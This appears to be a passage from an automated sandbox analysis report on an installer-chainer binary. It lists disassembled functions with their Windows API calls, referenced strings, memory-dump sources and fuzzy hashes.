GetWindowLongW.USER32(?,000000F0), ref: 0023DD5F
GetWindowLongW.USER32(?,000000F0), ref: 0023DD70
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0023DD82
GetWindowLongW.USER32(?,000000EC), ref: 0023DD95
SetWindowLongW.USER32(?,000000EC,00000000), ref: 0023DDA4
SendMessageW.USER32(?,0000007F,00000000,00000000), ref: 0023DDB8
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0023DDC7
GetClientRect.USER32(?,?), ref: 0023DDDE
GetClientRect.USER32(?,?), ref: 0023DE02
GetWindowRect.USER32(?,?), ref: 0023DE06
GetDlgItem.USER32(?,?), ref: 0023DE42
IsWindow.USER32(00000000), ref: 0023DE4D
GetWindowRect.USER32(?,?), ref: 0023DE68
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0023DE79

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Window$Long$Rect$ClientMessageSend$ItemPoints
String ID:
API String ID: 3417004906-0
Opcode ID: 238512dbc6b81eb5aad848a1c3f9608db09cfbbed455d052dd2ee1b03ce96ec2
Instruction ID: 814a4d40eceb6967405932e2d8f2898d226e7e0410ee814608f58fee79d4f715
Opcode Fuzzy Hash: 238512dbc6b81eb5aad848a1c3f9608db09cfbbed455d052dd2ee1b03ce96ec2
Instruction Fuzzy Hash: 23419EB15043069FDB20DF68EC44B2BBBE4BFA9710F214A1DF49597191DB30A8958F62

Function 0027C42B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(002D7FD4,00000FA0,?,?,0027C409), ref: 0027C437
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,0027C409), ref: 0027C442
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0027C409), ref: 0027C453
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0027C465
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0027C473
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0027C409), ref: 0027C496
DeleteCriticalSection.KERNEL32(002D7FD4,00000007,?,?,0027C409), ref: 0027C4B2
CloseHandle.KERNEL32(00000000,?,?,0027C409), ref: 0027C4C2

Strings

WakeAllConditionVariable, xrefs: 0027C46B
kernel32.dll, xrefs: 0027C44E
SleepConditionVariableCS, xrefs: 0027C45F
api-ms-win-core-synch-l1-2-0.dll, xrefs: 0027C43D

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: ac34d687dcb8a556c7f856a37a991d77a5c41c140457c57513f61c49ca631bf5
Instruction ID: 47a4ce69e7f3cc33f7329ede9faf5e107012495a0d075c0a4622a415fc5364b1
Opcode Fuzzy Hash: ac34d687dcb8a556c7f856a37a991d77a5c41c140457c57513f61c49ca631bf5
Instruction Fuzzy Hash: 46018871A657125FEF301F74BD2DA3A3AA8DB46B51B158025FD08E2690EFB4CC118A71

Function 002360E0 Relevance: 19.7, APIs: 8, Strings: 3, Instructions: 466registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\JavaSoft\Java Development Kit\,00000000,?,?,4938EAB5), ref: 00236143
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?), ref: 002362D9
RegQueryValueExW.ADVAPI32(?,JavaHome,00000000,00000000,00000000,?,?,?,?), ref: 00236335
RegQueryValueExW.ADVAPI32(?,JavaHome,00000000,00000000,00000000,?), ref: 00236385
RegCloseKey.ADVAPI32(?), ref: 002363C5

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

RegCloseKey.ADVAPI32(?,?), ref: 002366DE

Part of subcall function 00214E80: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,?,00242BC5,-00000010,?,?,?,4938EAB5,?,00000000,?,00000000), ref: 00214EA3

RegCloseKey.ADVAPI32(?,?,?,?), ref: 0023671B
RegCloseKey.ADVAPI32(?), ref: 002367A6

Strings

Software\JavaSoft\Java Development Kit\, xrefs: 00236135, 0023613D
Software\JavaSoft\Java Runtime Environment\, xrefs: 00236126
JavaHome, xrefs: 0023632F, 0023637A

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Close$OpenQueryValue$FindHeapProcessResource
String ID: JavaHome$Software\JavaSoft\Java Development Kit\$Software\JavaSoft\Java Runtime Environment\
API String ID: 1322027183-1079072530
Opcode ID: 1074d3c5f5363f1f5ca714294e5b2b674468a6e750b0d125a3dee3e176a4ed5d
Instruction ID: d35c129698af9a2ab940cf59fbb28b49eb11eb8984cbfca82fa9d3cf36b9a92b
Opcode Fuzzy Hash: 1074d3c5f5363f1f5ca714294e5b2b674468a6e750b0d125a3dee3e176a4ed5d
Instruction Fuzzy Hash: E41260B0911269ABDB20DF28CD8CBDEB7B9EF54304F1481D9E409A7291EB749E94CF50

Function 002779C0 Relevance: 18.1, APIs: 12, Instructions: 61synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?), ref: 002779DA
GetLastError.KERNEL32 ref: 002779E4
SetEvent.KERNEL32(?), ref: 002779E9
GetLastError.KERNEL32 ref: 002779F3
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 002779FA
GetLastError.KERNEL32 ref: 00277A05
CloseHandle.KERNEL32(00000000), ref: 00277A0F
GetLastError.KERNEL32 ref: 00277A15
CloseHandle.KERNEL32(?), ref: 00277A28
GetLastError.KERNEL32 ref: 00277A2E
CloseHandle.KERNEL32(?), ref: 00277A41
GetLastError.KERNEL32 ref: 00277A47

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$CloseHandle$Event$ObjectSingleWait
String ID:
API String ID: 2663162059-0
Opcode ID: b85588d2a85044d6bc783daca1c59e49eac94552c680d124e7acac7cea1790ce
Instruction ID: 64cab38747c20b0b51bc5557adeb2e8e40976ac1ea57cc9964c01eafe866e54f
Opcode Fuzzy Hash: b85588d2a85044d6bc783daca1c59e49eac94552c680d124e7acac7cea1790ce
Instruction Fuzzy Hash: 1B113331214703C7EB30AFB6EC88B1F77E8AF95355B218629D145D25A0EB70E9258A64

Function 00242E90 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00213FA0: GetModuleHandleW.KERNEL32(Kernel32.dll,GetTempPath2W,00000000), ref: 00214097
Part of subcall function 00213FA0: GetProcAddress.KERNEL32(00000000), ref: 0021409E
Part of subcall function 00213FA0: PathFileExistsW.KERNELBASE(?), ref: 00214109

Part of subcall function 00214390: GetTempFileNameW.KERNEL32(?,00000000,00000000,?,4938EAB5,?,00000004), ref: 00214408

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?), ref: 00242FE7
CloseHandle.KERNEL32(00000000,?,?), ref: 0024300F
WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?), ref: 00243051
CloseHandle.KERNEL32(?,?,?), ref: 002430A6
ShellExecuteW.SHELL32(00000000,open,?,00000000,?,00000000), ref: 002430D7

Part of subcall function 00214E80: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,?,00242BC5,-00000010,?,?,?,4938EAB5,?,00000000,?,00000000), ref: 00214EA3

ShellExecuteExW.SHELL32(?), ref: 0024312F

Strings

runas, xrefs: 00243117
open, xrefs: 002430D0
.bat, xrefs: 00242F30
EXE, xrefs: 00242F35

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: File$Handle$CloseExecuteShell$AddressCreateExistsFindHeapModuleNamePathProcProcessResourceTempWrite
String ID: .bat$EXE$open$runas
API String ID: 1017135135-1492471297
Opcode ID: 51c32eee371698c3adba2753911334d44077c2ecfbd36fcd03c6caad3c2006a7
Instruction ID: ec3058057df6b8811ccfc68e1b9acd7713b8901ca1241e3bb837cc1499a84e97
Opcode Fuzzy Hash: 51c32eee371698c3adba2753911334d44077c2ecfbd36fcd03c6caad3c2006a7
Instruction Fuzzy Hash: 59B1B970901249DFDB04CF68CD48BDEBBF4AF59314F248299F819AB291DBB49A15CF90

Function 00276070 Relevance: 16.8, APIs: 11, Instructions: 262synchronizationCOMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32(?), ref: 002760BB
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 002760CB
GetLastError.KERNEL32 ref: 002760D8
ResetEvent.KERNEL32(?), ref: 002760F4
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00276104
GetLastError.KERNEL32 ref: 00276111
GetLastError.KERNEL32 ref: 0027614F
SetEvent.KERNEL32(?), ref: 00276191
GetLastError.KERNEL32 ref: 00276197
WaitForSingleObject.KERNEL32(?,000000FF,?), ref: 002761FF
GetLastError.KERNEL32 ref: 0027620A

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorEventLast$CreateReset$ObjectSingleWait
String ID:
API String ID: 3708806560-0
Opcode ID: 79e9843fefbe811cf996d9c8727008435241a477f9f328092c369b010f5e244e
Instruction ID: d0de2a2f119c8f06d45d1a7a937ce55b7261339e588347997c67c617a63c756e
Opcode Fuzzy Hash: 79e9843fefbe811cf996d9c8727008435241a477f9f328092c369b010f5e244e
Instruction Fuzzy Hash: 1591F2327106128BEB24CF69D888B26B7E5AF44311F158569EC4DDB2A2DB31EC51CB94

Function 00238250 Relevance: 16.7, APIs: 11, Instructions: 192fileCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(002D8AF4,4938EAB5), ref: 0023828C

Part of subcall function 00214E80: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,?,00242BC5,-00000010,?,?,?,4938EAB5,?,00000000,?,00000000), ref: 00214EA3

EnterCriticalSection.KERNEL32(?,4938EAB5), ref: 00238299
WriteFile.KERNEL32(00000000,?,00000000,00240B71,00000000), ref: 002382CB
FlushFileBuffers.KERNEL32(00000000,?,00000000,00240B71,00000000), ref: 002382D4
WriteFile.KERNEL32(00000000,?,00000000,?,00000000,002BDB5C,00000001,?,00000000,00240B71,00000000), ref: 00238356
FlushFileBuffers.KERNEL32(00000000,?,00000000,00240B71,00000000), ref: 0023835F
WriteFile.KERNEL32(00000000,?,00000000,000000FF,00000000,?,00000000,00240B71,00000000), ref: 00238395
FlushFileBuffers.KERNEL32(00000000,?,00000000,000000FF,00000000,?,00000000,00240B71,00000000), ref: 0023839E
WriteFile.KERNEL32(00000000,?,00000000,002A29AD,00000000,002BC468,00000002,?,00000000,000000FF,00000000,?,00000000,00240B71,00000000), ref: 002383FF
FlushFileBuffers.KERNEL32(00000000,?,00000000,000000FF,00000000,?,00000000,00240B71,00000000), ref: 00238408
LeaveCriticalSection.KERNEL32(?,?,00000000,000000FF,00000000,?,00000000,00240B71,00000000), ref: 00238438

Part of subcall function 00213200: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,4938EAB5,00000000,0029B9F0,000000FF,?,?,002D3B80,?,0024D90C,80004005,4938EAB5,?,00000000), ref: 0021324A

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: File$BuffersFlushWrite$CriticalSection$AllocateEnterFindHeapInitializeLeaveResource
String ID:
API String ID: 201293332-0
Opcode ID: 6f5c6566a9ecb13b70fa52115284be05eede09d5f6e469a51591911bee365a11
Instruction ID: 7be420dc787183383999b2a4ed17ae1f8e3af81f20b79c98e58cf132bd5c792e
Opcode Fuzzy Hash: 6f5c6566a9ecb13b70fa52115284be05eede09d5f6e469a51591911bee365a11
Instruction Fuzzy Hash: 7D61BF70910645AFDB00DF68DC49BAEBBB4FF15310F148169F815AB2A1DB709D25CFA0

Function 0025ADC0 Relevance: 16.2, APIs: 7, Strings: 2, Instructions: 432synchronizationfileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0025AEB4
CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,00000000,.part,00000005,?,?,?), ref: 0025AFB6
GetFileSize.KERNEL32(00000000,00000000), ref: 0025B012
CloseHandle.KERNEL32(00000000), ref: 0025B036
ResetEvent.KERNEL32(?,00000000,002C157C,00000000,00000000,00000000,00000000,00000000,?), ref: 0025B2E8
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0025B317
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0025B321

Strings

.part, xrefs: 0025AE15
<, xrefs: 0025AEA3

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: FileObjectSingleWait$CloseCreateErrorEventHandleLastResetSize
String ID: .part$<
API String ID: 1885162932-3789028153
Opcode ID: 1c91cbf8b011063b25f67279b4fdb8311395bc9f8e29243d16229fafda65ac7c
Instruction ID: 3327df569dc48d54f55ac03f521e514a5e698da1cd395f3a7c68b3284433ed91
Opcode Fuzzy Hash: 1c91cbf8b011063b25f67279b4fdb8311395bc9f8e29243d16229fafda65ac7c
Instruction Fuzzy Hash: EB12BF30D1165ADBEB21CF64CC49B9DBBB0FF05314F148299E809A7291DB70AE98CF95

Function 0025A8C0 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 392synchronizationfileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0025AA0A
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,POST,?,?,-00000010), ref: 0025AC15
ResetEvent.KERNEL32(?), ref: 0025AC33
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0025AC5B
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0025AC62

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

Part of subcall function 0025BAB0: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,4938EAB5), ref: 0025BAEF
Part of subcall function 0025BAB0: GetLastError.KERNEL32 ref: 0025BB10
Part of subcall function 0025BAB0: CloseHandle.KERNEL32(?,?,?,?,?,?,?,002A9A55,000000FF), ref: 0025BDB6

Strings

123, xrefs: 0025A91C
POST, xrefs: 0025AAAF
DLD, xrefs: 0025A922
.part, xrefs: 0025A9B2

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorFileLastObjectSingleWait$CloseCreateDeleteEventHandleHeapProcessReset
String ID: .part$123$DLD$POST
API String ID: 3354080062-2664427314
Opcode ID: 72df553129b2121f7f72adf2f970be6af06600f67e82726023bce92b2aa3eb75
Instruction ID: d9ddd9f2760a834df811743bc48dab8ad170874698908136283a4226063da585
Opcode Fuzzy Hash: 72df553129b2121f7f72adf2f970be6af06600f67e82726023bce92b2aa3eb75
Instruction Fuzzy Hash: ECF1AC7091124AEFDB00DF68C849B9EBBB4FF49315F108219F815A7291EB74DA68CF91

Function 00228650 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157processsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00228758
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00228762
WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00228771
GetExitCodeProcess.KERNEL32(?,?), ref: 0022878E
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00228798
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 002287A5
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 002287AF

Strings

D, xrefs: 00228680
"%s" %s, xrefs: 002286E0

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorLastProcess$CloseCodeCreateExitHandleHeapObjectSingleWait
String ID: "%s" %s$D
API String ID: 3234789809-3971972636
Opcode ID: a36e6d9fdaefb020cb5ef305cf780c7a540fc718d60844202b2df9f49692f2dd
Instruction ID: 5baa3f5350115e7f50e22584d4d961701d75dae62fcf8a28741cc3644bb0d69b
Opcode Fuzzy Hash: a36e6d9fdaefb020cb5ef305cf780c7a540fc718d60844202b2df9f49692f2dd
Instruction Fuzzy Hash: 9F51E835921215EFDB10CFA4EC48BAAF7B9FF85724F354619E411A7290DB70E861CBA0

Function 0023E4B0 Relevance: 15.2, APIs: 10, Instructions: 155COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0023E4C1
DeleteObject.GDI32(?), ref: 0023E519

Part of subcall function 0023DEC0: IsWindowVisible.USER32 ref: 0023DED6
Part of subcall function 0023DEC0: SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 0023DEF2
Part of subcall function 0023DEC0: GetWindowLongW.USER32(?,000000F0), ref: 0023DEF8
Part of subcall function 0023DEC0: GetDlgItem.USER32(?,?), ref: 0023DF6A
Part of subcall function 0023DEC0: GetWindowRect.USER32(00000000,?), ref: 0023DF82
Part of subcall function 0023DEC0: MapWindowPoints.USER32(00000000,?,00000002,00000002), ref: 0023DF93

EndDialog.USER32(?,00000000), ref: 0023E599

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Window$Long$DeleteDialogItemMessageObjectPointsRectSendVisible
String ID:
API String ID: 2368538989-0
Opcode ID: 522c9e227c891132707dc815fd227bde004d3b8569f10f0ec3a26f9e863529ae
Instruction ID: 2b5ca2c60a7dc0481b001c24b6a3989babd822a595d3a56cb459856b51202323
Opcode Fuzzy Hash: 522c9e227c891132707dc815fd227bde004d3b8569f10f0ec3a26f9e863529ae
Instruction Fuzzy Hash: A74117B232421557CF349E3CAC09B7B379CDB95731F010B2AFD25D32D0DA6198298AA1

Function 0027C145 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0027C14B
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0027C159
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0027C16A
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 0027C17B

Strings

kernel32.dll, xrefs: 0027C146
GetCurrentPackageId, xrefs: 0027C153
GetSystemTimePreciseAsFileTime, xrefs: 0027C15F
GetTempPath2W, xrefs: 0027C170

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: 47454bf8ef859da67ddc1427ea21ceb917fbdfca2114fcd456344217a54db0c8
Instruction ID: 2fdba1181ae989e08418771ad1f5252499828d525da07c607171fdfbf59bacc6
Opcode Fuzzy Hash: 47454bf8ef859da67ddc1427ea21ceb917fbdfca2114fcd456344217a54db0c8
Instruction Fuzzy Hash: 71E0EC31A7A320AF8B505FB4BD0D88A3BA4AB0B7963420463B511E2260FEB848518B61

Function 0025F410 Relevance: 13.7, APIs: 9, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000427), ref: 0025F4B6
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0025F4C6
EndDialog.USER32(00000000,00000001), ref: 0025F4DA

Part of subcall function 0025F7C0: SetWindowTextW.USER32(00000000,002AA475), ref: 0025F84F
Part of subcall function 0025F7C0: GetDlgItem.USER32(00000000,0000042B), ref: 0025F8A7
Part of subcall function 0025F7C0: SetWindowTextW.USER32(00000000,00000000), ref: 0025F8AE
Part of subcall function 0025F7C0: GetDlgItem.USER32(?,00000001), ref: 0025F8BB
Part of subcall function 0025F7C0: EnableWindow.USER32(00000000,00000000), ref: 0025F8C0

EndDialog.USER32(00000000,00000002), ref: 0025F505
GetDlgItem.USER32(00000000,00000001), ref: 0025F554
EnableWindow.USER32(00000000,00000000), ref: 0025F566

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ItemWindow$DialogEnableText$MessageSend
String ID:
API String ID: 3408327222-0
Opcode ID: 0502f5113c21f618579636d7bcd987d2295efb8f385ba4c43648e65612a9a1a4
Instruction ID: d17120ccabc73b2ab1852a030fe36f3232bec58f13111ce51c87144f850a883f
Opcode Fuzzy Hash: 0502f5113c21f618579636d7bcd987d2295efb8f385ba4c43648e65612a9a1a4
Instruction Fuzzy Hash: 5B513571A10205AFEB149F28E989B7677A4FB45322F40417AFD1187290EB72DC69CFE1

Function 0023DEC0 Relevance: 13.7, APIs: 9, Instructions: 156windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 0023DED6
SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 0023DEF2
GetWindowLongW.USER32(?,000000F0), ref: 0023DEF8
GetDlgItem.USER32(?,?), ref: 0023DF6A
GetWindowRect.USER32(00000000,?), ref: 0023DF82
MapWindowPoints.USER32(00000000,?,00000002,00000002), ref: 0023DF93
SetWindowPos.USER32(00000014,00000000,?,00000002,00000002,?,00000014,?,00000002,00000002,?,?,?,000000F0,?,00000000), ref: 0023E00F
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 0023E043
RedrawWindow.USER32(?,00000000,00000000,00000185), ref: 0023E050

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

